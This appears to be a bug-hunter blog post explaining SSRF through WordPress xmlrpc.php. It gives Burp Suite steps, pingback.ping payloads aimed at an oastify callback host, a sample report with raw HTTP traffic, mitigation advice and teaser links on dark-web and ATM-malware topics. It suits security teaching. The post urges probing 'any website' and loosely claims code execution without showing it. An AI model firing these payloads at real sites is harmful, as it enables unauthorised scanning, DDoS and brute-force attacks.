XMLRPC Attack leads to SSRF (SSRF via XMLRPC)

-

In this Article ?

  • What is XMLRPC Attack ?
  • What is SSRF Attack ?
  • SSRF via XMLRPC 
  • How to Perform SSRF via XMLRPC ? 
  • Reporting
  • Impact
  • Mitigation

What is XMLRPC Attack ?

XML-RPC is a simple and widely supported protocol that has been used in various applications, such as web services, blogging platforms, content management systems, and remote administration of software systems. It provides a standardized way for different software components to interact and exchange data in a cross-platform manner.

If an XML-RPC implementation is vulnerable to remote code execution, an attacker can send specially crafted XML-RPC requests to execute arbitrary code on the server. This can lead to unauthorized access, data breaches, or further exploitation of the system.

What is SSRF Attack ?
A Server-Side Request Forgery (SSRF) attack is a type of security vulnerability that occurs when an attacker is able to manipulate a web application into making unintended requests to internal or external resources on behalf of the server. This attack can be particularly dangerous when it targets a search engine.

The consequences of an SSRF attack on a search engine can vary depending on the server's configuration and the nature of the requests. Here are a few possible scenarios.

SSRF via XMLRPC Attack ?
SSRF (Server-Side Request Forgery) via XML-RPC attack is a specific type of attack that leverages XML-RPC functionality to perform SSRF vulnerabilities. SSRF occurs when an attacker can make a targeted server initiate requests to other internal or external resources on behalf of the server itself. By exploiting SSRF through XML-RPC, an attacker can potentially gain unauthorized access to sensitive data, perform port scanning, or launch attacks against internal systems.

How To Perform SSRF via XMLRPC ?
STEP #1: visit any website put the xmlrpc.php at end of website URL. Then you will get "XML-RPC server accepts POST requests only" like this.

STEP #2: Take the request of the vulnerable URL in your Burp Suite. Send the request to the repeater in the burp suite. Then change the request method from Get to Post. 

STEP #3: Put first XML-RPC exploit method. then you will get the system list method.
                    <methodCall>
                    <methodName>system.listMethods</methodName>
                    <params></params>
                    </methodCall>
you can attack any of these.

STEP #4: I will able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file. Now Paste second XML-RPC exploit methods.

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>Paste the burp collaborator link</string></value>
</param>
<param>
<value><string>Enter the website name</string></value>
</param>
</params>
</methodCall>

STEP #5: Now poll on Burp Collaborator page of Burp Suite, you will get DNS IP which any attacker will scan and find famous open hacking port.
The attacker can exploit the SSRF vulnerability to gather sensitive information, escalate the attack to gain unauthorized access to internal systems, or pivot to further attack the network infrastructure.

Impact:
SSRF attacks can enable an attacker to scan internal networks or external systems accessible by the server. By requesting URLs that correspond to internal IP addresses or other external targets, the attacker can perform network reconnaissance, identify open ports, or search for additional vulnerabilities to exploit.

If the attacker can pivot from SSRF to other internal systems through the compromised server, they may gain unauthorized access to critical resources. This could involve accessing additional servers, databases, or administrative panels. Unauthorized access can lead to further data breaches, manipulation of system configurations, or privilege escalation attacks.

Mitigation:
Mitigating SSRF (Server-Side Request Forgery) attacks via XML-RPC involves implementing various security measures to prevent unauthorized access and protect sensitive resources :

1. Use URL filtering techniques to block requests to internal or sensitive resources. Maintain a blacklist of known malicious URLs or internal-only resources that should never be accessed via XML-RPC. Block or sanitize requests that match the blacklist.
2. Implement strict input validation on XML-RPC requests to ensure that only valid and expected URLs are allowed. Validate the URL parameter to prevent the use of internal or malicious addresses. Additionally, maintain a whitelist of trusted external resources that the server is allowed to access via XML-RPC requests.
3. Ensure that the XML-RPC-enabled server operates with the principle of least privilege. Restrict the server's access rights to only the necessary resources and functionalities required for its operation. Avoid granting unnecessary permissions or elevated privileges that could be abused in an SSRF attack.

                        How to Report ?
Hello Team
                 I'm Career Technology Cyber security India a white security researcher from mumbai INDIA, founded a vulnerability on your website

Vulnerability Name: XML-RPC & SSRF via XMLRPC 

Descriptions  :
“XML-RPC” also refers generically to the use of XML for a remote procedure call, independently of the specific protocol. XML-RPC for PHP is affected by a remote code-injection vulnerability. An attacker may exploit this issue to execute arbitrary commands or code in the context of the web server.

Vulnerable URL: https://exmple.com/xmlrpc.php

Steps to Reproduce :
1.Go to the website : https://exmple.com
2.Put the xmlrpc.php at end of your website URL
3.Take the request of the vulnerable URL in your Burp Suite 
4.Send the request to the repeater in the burp suite
5 .Then change the request method from Get to Post 
6.Put first XML-RPC exploit method   

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

Response:
HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:41:22 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3NOLmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 4273
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><string>system.multicall</string></value>
  <value><string>system.listMethods</string></value>
  <value><string>system.getCapabilities</string></value>
  <value><string>demo.addTwoNumbers</string></value>
  <value><string>demo.sayHello</string></value>
  <value><string>pingback.extensions.getPingbacks</string></value>
  <value><string>pingback.ping</string></value>
  <value><string>mt.publishPost</string></value>
  <value><string>mt.getTrackbackPings</string></value>
  <value><string>mt.supportedTextFilters</string></value>
  <value><string>mt.supportedMethods</string></value>
  <value><string>mt.setPostCategories</string></value>
  <value><string>mt.getPostCategories</string></value>
  <value><string>mt.getRecentPostTitles</string></value>
  <value><string>mt.getCategoryList</string></value>
  <value><string>metaWeblog.getUsersBlogs</string></value>
  <value><string>metaWeblog.deletePost</string></value>
  <value><string>metaWeblog.newMediaObject</string></value>
  <value><string>metaWeblog.getCategories</string></value>
  <value><string>metaWeblog.getRecentPosts</string></value>
  <value><string>metaWeblog.getPost</string></value>
  <value><string>metaWeblog.editPost</string></value>
  <value><string>metaWeblog.newPost</string></value>
  <value><string>blogger.deletePost</string></value>
  <value><string>blogger.editPost</string></value>
  <value><string>blogger.newPost</string></value>
  <value><string>blogger.getRecentPosts</string></value>
  <value><string>blogger.getPost</string></value>
  <value><string>blogger.getUserInfo</string></value>
  <value><string>blogger.getUsersBlogs</string></value>
  <value><string>wp.restoreRevision</string></value>
  <value><string>wp.getRevisions</string></value>
  <value><string>wp.getPostTypes</string></value>
  <value><string>wp.getPostType</string></value>
  <value><string>wp.getPostFormats</string></value>
  <value><string>wp.getMediaLibrary</string></value>
  <value><string>wp.getMediaItem</string></value>
  <value><string>wp.getCommentStatusList</string></value>
  <value><string>wp.newComment</string></value>
  <value><string>wp.editComment</string></value>
  <value><string>wp.deleteComment</string></value>
  <value><string>wp.getComments</string></value>
  <value><string>wp.getComment</string></value>
  <value><string>wp.setOptions</string></value>
  <value><string>wp.getOptions</string></value>
  <value><string>wp.getPageTemplates</string></value>
  <value><string>wp.getPageStatusList</string></value>
  <value><string>wp.getPostStatusList</string></value>
  <value><string>wp.getCommentCount</string></value>
  <value><string>wp.deleteFile</string></value>
  <value><string>wp.uploadFile</string></value>
  <value><string>wp.suggestCategories</string></value>
  <value><string>wp.deleteCategory</string></value>
  <value><string>wp.newCategory</string></value>
  <value><string>wp.getTags</string></value>
  <value><string>wp.getCategories</string></value>
  <value><string>wp.getAuthors</string></value>
  <value><string>wp.getPageList</string></value>
  <value><string>wp.editPage</string></value>
  <value><string>wp.deletePage</string></value>
  <value><string>wp.newPage</string></value>
  <value><string>wp.getPages</string></value>
  <value><string>wp.getPage</string></value>
  <value><string>wp.editProfile</string></value>
  <value><string>wp.getProfile</string></value>
  <value><string>wp.getUsers</string></value>
  <value><string>wp.getUser</string></value>
  <value><string>wp.getTaxonomies</string></value>
  <value><string>wp.getTaxonomy</string></value>
  <value><string>wp.getTerms</string></value>
  <value><string>wp.getTerm</string></value>
  <value><string>wp.deleteTerm</string></value>
  <value><string>wp.editTerm</string></value>
  <value><string>wp.newTerm</string></value>
  <value><string>wp.getPosts</string></value>
  <value><string>wp.getPost</string></value>
  <value><string>wp.deletePost</string></value>
  <value><string>wp.editPost</string></value>
  <value><string>wp.newPost</string></value>
  <value><string>wp.getUsersBlogs</string></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>

7.  I was able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file 

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 265

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://s4xi0a4xhtoh4sxjsev7eqlpfgl69v.oastify.com</string></value>
</param>
<param>
<value><string>https://exmple.com</string></value>
</param>
</params>
</methodCall>


Response:
  HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:59:35 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3N0LmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 370
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>0</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string></string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Impact:
1)This can be automated from multiple hosts and be used to cause a mass DDOS attack on the victim. 
2) This method is also used for brute force attacks to stealing the admin credentials and other important credentials

Plus, there are a lot of PoCs lying around the web concerning the vulnerabilities associated with XMLRPC.php in WordPress websites.

XML-RPC pingbacks attacks :
In this case, an attacker is able to leverage the default XML-RPC API in order to perform callbacks for the following purposes:

Distributed denial-of-service (DDoS) attacks - An attacker executes the pingback.ping the method from several affected WordPress installations against a single unprotected target (botnet level).

XSPA (Cross Site Port Attack) - An attacker can execute the pingback.ping method from a single affected WordPress installation to the same host (or other internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in time of response and/or by looking at the response of the request.

Supporting Material/References:
1) https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/ 
2) https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html 
3) https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

How do I block XML-RPC?
Method 1 - Plugin
1. Log into your WordPress Admin Dashboard.
2. Click on Plugins >> Add New.
3. Search for "Disable XML-RPC" and install the Disable XML-RPC plugin.
4. Simply activate the plugin, and that's it! XML-RPC should be disabled.
5. You can recheck using the XML-RPC Validator.

PFA of screenshots for steps by steps guidance also help to regenerate the Vulnerability

Thanks & Regard,
Career Technology Cyber security India
Indian Bug Hunter

Comments

Post a Comment

Popular posts from this blog

Some Dark web Links

-
Image
Here are some of the Forum/Website to visit on dark web related to cybersecurity and hacking. Before visiting this website please follow the steps to be safe on the dark web/ Deepweb. Security Steps to be taken before opening the links: First of All, To browse these dark web forums, first close all active programs and applications in your computer then start Your NordVPN or any Paid and HQ VPN that have TOR service and select Onion Over VPN Server.  Now start Tor Browser and disable Javascript. In this way, you have created a completely secure and untraceable environment for you. If you think Tor Browser gives you full anonymity then you are wrong.  Only premium VPN services can provide you fully secure and untraceable environment. I have tried my hands on many premium VPN services, and I found NordVPN beats its competitor in all features. Disclaimer ⚠ : This info are shared for educational purpose only, neither the website nor creator hold any info or liable to any
Read more

How to join Cyber Cell or Cyber Crime Department in India || Exam or Direct or Skills???

-
Image
 How to join Cyber Cell or Cyber Crime Department in India || Exam or Direct or Skills??? Hello Guys, today's topic is How to join Cyber Cell in India. All of us has dreamed of joining the cybercrime department and working as an officer for the nation. Some of us have tried to search it on the internet asked our colleagues and friends relatives but somewhere we are not able to find the correct and satisfying answer o our question. Don't worry today Career Technology is going help you out to find all your questions answered in a single post. Welcome Everyone :)  Let's get started  HOW TO JOIN CYBER CELL THROUGH EXAM?? In the cyber cell department, there is no specific exam to join the cyber cell. Now What if there is no exam for cyber cell??? You can join cyber cell by applying for the exam of CBI or IB and then after getting selected for this you can apply for the cyber cell. HOW TO JOIN CBI OR IB?? Firstly you need to apply for this post to join cyber cell and to join CBI
Read more

ATM HACKING TOOL TRENDING ON DARK WEB

-
Image
ATM HACKING TOOL TRENDING ON DARK WEB Latest hacking tools and devices have a great sale on the dark web, an ATM can be hacked within 15 to 20 minutes by any amateur person too. The one should know basics of it before buying such things, cybersecurity startup knowledge. The person who discovers this is CloudSEK Rakesh Krishnan says "The seller on the dark web has latyest ready-made tools such has malware cards, USB ATM Malware and many more such tools to dispense money from the ATM". HE also said that "Earlier, though these were slightly complicated, now with these devices, anybody can control these machines,” . WHAT HE DISCOVERED? HE talked to the seller as a buyer to many online shops and One of the shops offered him  ATM Malware Card, PIN Descriptor, Trigger Card and an instruction guide which tells how to suspend the cash from the machine. Once installed, it captures all card details stealthily. The amount can be withdrawn using Trigger Card, that d
Read more